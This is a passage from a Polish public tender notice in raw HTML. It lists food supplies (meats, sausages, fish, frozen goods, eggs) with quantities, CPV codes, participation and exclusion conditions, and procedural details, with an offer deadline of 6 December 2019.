łopatka b/k i bez tłuszczu - 150kg14. Wieprzowina - karkówka b/k - 500kg15. Wieprzowina - biodrówka b/k - 50kg16. Wieprzowina - pachwina - 50kg17. Wieprzowina - nóżki	- 50kg18. Wieprzowina - przedgolonki - 50kg19. Wieprzowina-schab b/k - 500kg20. Żeberka wieprzowe trójkąty - 90kg21. Wieprzowina - kości schabowe -150kg22. Parówka z szynki - 100kg23. Polędwica drobiowa - 200kg24. Polędwica z warzywami - 200kg25. Kiełbasa parówkowa serdelki - 500kg26. Kiełbasa śląska- 200kg27. Kiełbasa szynkowa - 100kg28. Kiełbasa szynkowa drobiowa - 150kg29. Kiełbasa wiejska - 50kg30. Kiełbasa mielonka - 70kg31. Kiełbasa zwyczajna - 600kg32. Kiełbasa krakowska - 200kg33. Kiełbasa mortadela - 150kg34. Kiełbasa piwna - 30kg35. Kiełbasa biała parzona - 80kg36. Kiełbasa biała surowa - 30kg37. Kiełbasa żywiecka - 150kg38. Kiełbasa golonkowa - 30kg39. Kiełbasa jałowcowa - 80kg40. Schab wędzony - 50kg41. Schab pieczony - 50kg42. Polędwica sopocka - 200kg43. Ogonówka wędzona - 50kg44. Baleron - 50kg45. Pierś wędzona z indyka - 30kg46. Filet z piersi indyka - 50kg47. Boczek surowy - 120kg48. Boczek wędzony parzony - 80kg49. Boczek faszerowany - 30kg50. Rolada boczkowa - 30kg51. Szynka gotowana - 150kg52. Szynka typu z pieca	- 60kg53. Szynka typu krucha - 60kg54. Szynka drobiowa prasowana - 50kg55. Salceson drobiowy z kurczaka - 100kg56. Salceson drobiowy z indyka - 100kg57. Salceson wieprzowy włoski - 100kg58. Kaszanka z podrobami - 300kg59. Pieczeń wieprzowa - 80kg60. Pieczeń a’la kaczka - 40kg61. Pasztet zapiekany - 150kg62. Pasztetowa drobiowa - 200kg63. Słonina świeża bez skóry - 120kg64. Żołądki drobiowe świeże - 40kg65. Żołądki z indyka świeże - 40kg66. Kości wędzone wieprzowe - 150kg67. Pachwina wędzona - 30kg68. Szynka konserwowa prasowana - 150kg69. Kiełbasa salami - 10kg70. Kiełbasa ze świniobicia - 20kg71. Kabanosy wieprzowe - 15kg72. Kabanosy drobiowe - 15kg73. Kiełbasa biała z szynki - 50kg74. Parówka z fileta - 50kg75. Pasztet borowikowy - 50kg76. Pasztetowa wędzona - 50kg77. Kiełbasa wieprzowa z cielęciną - 30kg78. Kiełbasa geesowska - 30kg79. Kiełbasa myśliwska - 20kgCzęść 6. Ryby, mrożonki i przetwory warzywno owocowe1. Filet z dorsza mrożony SHP, bez glazury - 500kg2. Miruna mrożona - filet SHP, bez glazury - 500kg3. Śledź a’la Matjas - 300kg4. Śledź po kaszubsku - 50kg5. Śledź po wiejsku - 150kg6. Pyzy z mięsem - 320kg7. Pyzy ziemniaczane - 200kg8. Knedle z truskawkami	- 240kg9. Mrożonka wiosenna 7 skład. - 500kg10. Mrożonka włoszczyzna paski - 1000kg11. Mrożonka bukiet warzyw - 400kg12. Mrożonka kompotowa - 500kg13. Kalafior mrożony - 100kg14. Truskawka mrożona - 80kg15. Fasola mrożona szparagowa - 300kg16. Lody różne na patyku po 50 ml - 300szt.17. Lody różne na patyku po 110 ml - 450szt.18. Lody rożne rożek po 110 ml - 300szt.19. Lody różne w kubku po 200 ml - 150szt.20. Lody różne po 5 l - 50l21. Pierogi z serem - 120kg22. Pierogi ruskie - 120kg23. Tłuszcz FRYTURA - 30kg24. Szczaw konserwowy -	40kg25. Jabłka prażone "szarlotka" - 300kg26. Margaryna w płynie po 3,7 l - 15szt.27. Ćwiartka z kurczaka mrożona	- 360kg28. Czarna porzeczka mrożona - 100kg29. Kluski śląskie z dziurą - 120kg30. Mrożone leczo - 120kg31. Malina mrożona - 80kg32. Szpinak rozdrobniony - 50kg33. Koncentrat owocowy po 5 l (Kanister) bez syntetycznych barwników i substancji słodzących - 20szt.Część 7. Jaja 1. Jaja kurze „L” - 40000szt.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">15800000-6</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15600000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15400000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15500000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15811000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15300000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15110000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15130000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15200000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>03142500-3</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2020-12-31</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">nie dotyczy</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">nie dotyczy</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">nie dotyczy</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt. 1 Ustawy</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena oferty brutto</TD><TD style='border: 1px solid black;border-collapse: collapse;'>100,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zakres zmian oraz warunki ich wprowadzenia określone zostały w specyfikacji istotnych warunków zamówienia</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-12-06</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:45</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Ofertę należy sporządzić w języku polskim</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Artykuły spożywcze różne</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa niżej określonych artykułów: 